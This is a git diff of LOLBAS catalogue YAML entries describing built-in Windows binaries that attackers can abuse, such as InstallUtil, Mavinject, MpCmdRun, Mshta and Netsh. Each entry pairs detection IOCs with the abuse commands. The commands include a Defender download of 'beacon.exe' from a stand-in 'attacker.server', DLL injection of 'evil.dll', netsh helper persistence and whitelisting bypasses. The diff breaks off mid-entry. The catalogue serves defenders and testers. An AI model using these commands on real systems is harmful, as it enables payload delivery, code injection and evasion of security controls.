- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Infdefaultinstall.exe
|
Name: Infdefaultinstall.exe
|
||||||
Description: Binary used to perform installation based on content inside inf files
|
Description: Binary used to perform installation based on content inside inf files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
||||||
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -25,4 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Kyle Hanslovan
|
- Person: Kyle Hanslovan
|
||||||
Handle: '@kylehanslovan'
|
Handle: '@kylehanslovan'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Installutil.exe
|
Name: Installutil.exe
|
||||||
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
Description: Execute the target .NET DLL or EXE.
|
Description: Execute the target .NET DLL or EXE.
|
||||||
@ -25,7 +25,7 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -39,4 +39,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Jsc.exe
|
Name: Jsc.exe
|
||||||
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2019-05-31'
|
Created: 2019-05-31
|
||||||
Commands:
|
Commands:
|
||||||
- Command: jsc.exe scriptfile.js
|
- Command: jsc.exe scriptfile.js
|
||||||
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
||||||
@ -25,14 +25,14 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Jsc.exe should normally not run a system unless it is used for development.
|
- IOC: Jsc.exe should normally not run a system unless it is used for development.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/DissectMalware/status/998797808907046913
|
- Link: https://twitter.com/DissectMalware/status/998797808907046913
|
||||||
- Link: https://www.phpied.com/make-your-javascript-a-windows-exe/
|
- Link: https://www.phpied.com/make-your-javascript-a-windows-exe/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Malwrologist
|
- Person: Malwrologist
|
||||||
Handle: '@DissectMalware'
|
Handle: '@DissectMalware'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Makecab.exe
|
Name: Makecab.exe
|
||||||
Description: Binary to package existing files into a cabinet (.cab) file
|
Description: Binary to package existing files into a cabinet (.cab) file
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||||
@ -31,7 +31,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\makecab.exe
|
- Path: C:\Windows\System32\makecab.exe
|
||||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Makecab getting files from Internet
|
- IOC: Makecab getting files from Internet
|
||||||
@ -41,4 +41,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Mavinject.exe
|
Name: Mavinject.exe
|
||||||
Description: Used by App-v in Windows
|
Description: Used by App-v in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
||||||
Description: Inject evil.dll into a process with PID 3110.
|
Description: Inject evil.dll into a process with PID 3110.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mavinject.exe
|
- Path: C:\Windows\System32\mavinject.exe
|
||||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||||
@ -36,4 +36,4 @@ Acknowledgement:
|
|||||||
Handle: '@gN3mes1s'
|
Handle: '@gN3mes1s'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Microsoft.Workflow.Compiler.exe
|
Name: Microsoft.Workflow.Compiler.exe
|
||||||
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
||||||
Author: 'Conor Richard'
|
Author: 'Conor Richard'
|
||||||
Created: '2018-10-22'
|
Created: 2018-10-22
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
||||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||||
@ -19,7 +19,7 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||||
OperatingSystem: Windows 10S
|
OperatingSystem: Windows 10S
|
||||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||||
Usecase: Compile and run code
|
Usecase: Compile and run code
|
||||||
@ -27,10 +27,10 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||||
OperatingSystem: Windows 10S
|
OperatingSystem: Windows 10S
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
||||||
@ -53,4 +53,4 @@ Acknowledgement:
|
|||||||
Handle: '@FortyNorthSec'
|
Handle: '@FortyNorthSec'
|
||||||
- Person: Bank Security
|
- Person: Bank Security
|
||||||
Handle: '@Bank_Security'
|
Handle: '@Bank_Security'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Mmc.exe
|
Name: Mmc.exe
|
||||||
Description: Load snap-ins to locally and remotely manage Windows systems
|
Description: Load snap-ins to locally and remotely manage Windows systems
|
||||||
Author: '@bohops'
|
Author: '@bohops'
|
||||||
Created: '2018-12-04'
|
Created: 2018-12-04
|
||||||
Commands:
|
Commands:
|
||||||
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
||||||
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
||||||
@ -15,10 +15,10 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mmc.exe
|
- Path: C:\Windows\System32\mmc.exe
|
||||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: MpCmdRun.exe
|
Name: MpCmdRun.exe
|
||||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '09/03/2020'
|
Created: 2020-03-20
|
||||||
Commands:
|
Commands:
|
||||||
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
||||||
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
||||||
@ -32,9 +32,9 @@ Full_Path:
|
|||||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
|
||||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
|
||||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: MpCmdRun storing data into alternate data streams.
|
- IOC: MpCmdRun storing data into alternate data streams.
|
||||||
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
|
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
|
||||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
||||||
@ -54,4 +54,4 @@ Acknowledgement:
|
|||||||
Handle: ''
|
Handle: ''
|
||||||
- Person: Cedric
|
- Person: Cedric
|
||||||
Handle: '@th3c3dr1c'
|
Handle: '@th3c3dr1c'
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Msbuild.exe
|
Name: Msbuild.exe
|
||||||
Description: Used to compile and execute code
|
Description: Used to compile and execute code
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: msbuild.exe pshell.xml
|
- Command: msbuild.exe pshell.xml
|
||||||
Description: Build and execute a C# project stored in the target XML file.
|
Description: Build and execute a C# project stored in the target XML file.
|
||||||
@ -37,7 +37,7 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||||
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
|
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Msconfig.exe
|
Name: Msconfig.exe
|
||||||
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Msconfig.exe -5
|
- Command: Msconfig.exe -5
|
||||||
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\msconfig.exe
|
- Path: C:\Windows\System32\msconfig.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: mscfgtlc.xml changes in system32 folder
|
- IOC: mscfgtlc.xml changes in system32 folder
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Pierre-Alexandre Braeken
|
- Person: Pierre-Alexandre Braeken
|
||||||
Handle: '@pabraeken'
|
Handle: '@pabraeken'
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Msdt.exe
|
Name: Msdt.exe
|
||||||
Description: Microsoft diagnostics tool
|
Description: Microsoft diagnostics tool
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||||
@ -23,15 +23,15 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Msdt.exe
|
- Path: C:\Windows\System32\Msdt.exe
|
||||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
- Link: https://twitter.com/harr0ey/status/991338229952598016
|
- Link: https://twitter.com/harr0ey/status/991338229952598016
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Mshta.exe
|
Name: Mshta.exe
|
||||||
Description: Used by Windows to execute html applications. (.hta)
|
Description: Used by Windows to execute html applications. (.hta)
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: mshta.exe evilfile.hta
|
- Command: mshta.exe evilfile.hta
|
||||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||||
@ -39,7 +39,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mshta.exe
|
- Path: C:\Windows\System32\mshta.exe
|
||||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||||
@ -48,10 +48,10 @@ Resources:
|
|||||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Msiexec.exe
|
Name: Msiexec.exe
|
||||||
Description: Used by Windows to execute msi files
|
Description: Used by Windows to execute msi files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: msiexec /quiet /i cmd.msi
|
- Command: msiexec /quiet /i cmd.msi
|
||||||
Description: Installs the target .MSI file silently.
|
Description: Installs the target .MSI file silently.
|
||||||
@ -35,11 +35,11 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\msiexec.exe
|
- Path: C:\Windows\System32\msiexec.exe
|
||||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: msiexec.exe getting files from Internet
|
- IOC: msiexec.exe getting files from Internet
|
||||||
@ -51,4 +51,4 @@ Acknowledgement:
|
|||||||
Handle: '@netbiosX'
|
Handle: '@netbiosX'
|
||||||
- Person: Philip Tsukerman
|
- Person: Philip Tsukerman
|
||||||
Handle: '@PhilipTsukerman'
|
Handle: '@PhilipTsukerman'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Netsh.exe
|
Name: Netsh.exe
|
||||||
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
||||||
Author: 'Freddie Barr-Smith'
|
Author: 'Freddie Barr-Smith'
|
||||||
Created: '2019-12-24'
|
Created: 2019-12-24
|
||||||
Commands:
|
Commands:
|
||||||
- Command: netsh.exe add helper C:\Users\User\file.dll
|
- Command: netsh.exe add helper C:\Users\User\file.dll
|
||||||
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\WINDOWS\System32\Netsh.exe
|
- Path: C:\WINDOWS\System32\Netsh.exe
|
||||||
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
|
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Netsh initiating a network connection
|
- IOC: Netsh initiating a network connection
|
||||||
@ -32,4 +32,4 @@ Acknowledgement:
|
|||||||
Handle:
|
Handle:
|
||||||
- Person: 'Xabier Ugarte-Pedrero'
|
- Person: 'Xabier Ugarte-Pedrero'
|
||||||
Handle:
|
Handle:
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Odbcconf.exe
|
Name: Odbcconf.exe
|
||||||
Description: Used in Windows for managing ODBC connections
|
Description: Used in Windows for managing ODBC connections
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: odbcconf -f file.rsp
|
- Command: odbcconf -f file.rsp
|
||||||
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\odbcconf.exe
|
- Path: C:\Windows\System32\odbcconf.exe
|
||||||
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -36,4 +36,4 @@ Acknowledgement:
|
|||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
- Person: Adam
|
- Person: Adam
|
||||||
Handle: '@Hexacorn'
|
Handle: '@Hexacorn'
|
||||||
---
|
---
|
||||||
|
22
yml/OSBinaries/OfflineScannerShell.yml
Normal file
22
yml/OSBinaries/OfflineScannerShell.yml
Normal file
@ -0,0 +1,22 @@
|
|||||||
|
---
|
||||||
|
Name: OfflineScannerShell.exe
|
||||||
|
Description: Windows Defender Offline Shell
|
||||||
|
Author: 'Elliot Killick'
|
||||||
|
Created: '2021-08-16'
|
||||||
|
Commands:
|
||||||
|
- Command: OfflineScannerShell
|
||||||
|
Description: Execute mpclient.dll library in the current working directory
|
||||||
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||||
|
Category: Execute
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
|
||||||
|
Detection:
|
||||||
|
- IOC: OfflineScannerShell.exe should not be run on a normal workstation
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Elliot Killick
|
||||||
|
Handle: '@elliotkillick'
|
||||||
|
---
|
25
yml/OSBinaries/OneDriveStandaloneUpdater.yml
Normal file
25
yml/OSBinaries/OneDriveStandaloneUpdater.yml
Normal file
@ -0,0 +1,25 @@
|
|||||||
|
---
|
||||||
|
Name: OneDriveStandaloneUpdater.exe
|
||||||
|
Description: OneDrive Standalone Updater
|
||||||
|
Author: 'Elliot Killick'
|
||||||
|
Created: '2021-08-22'
|
||||||
|
Commands:
|
||||||
|
- Command: OneDriveStandaloneUpdater
|
||||||
|
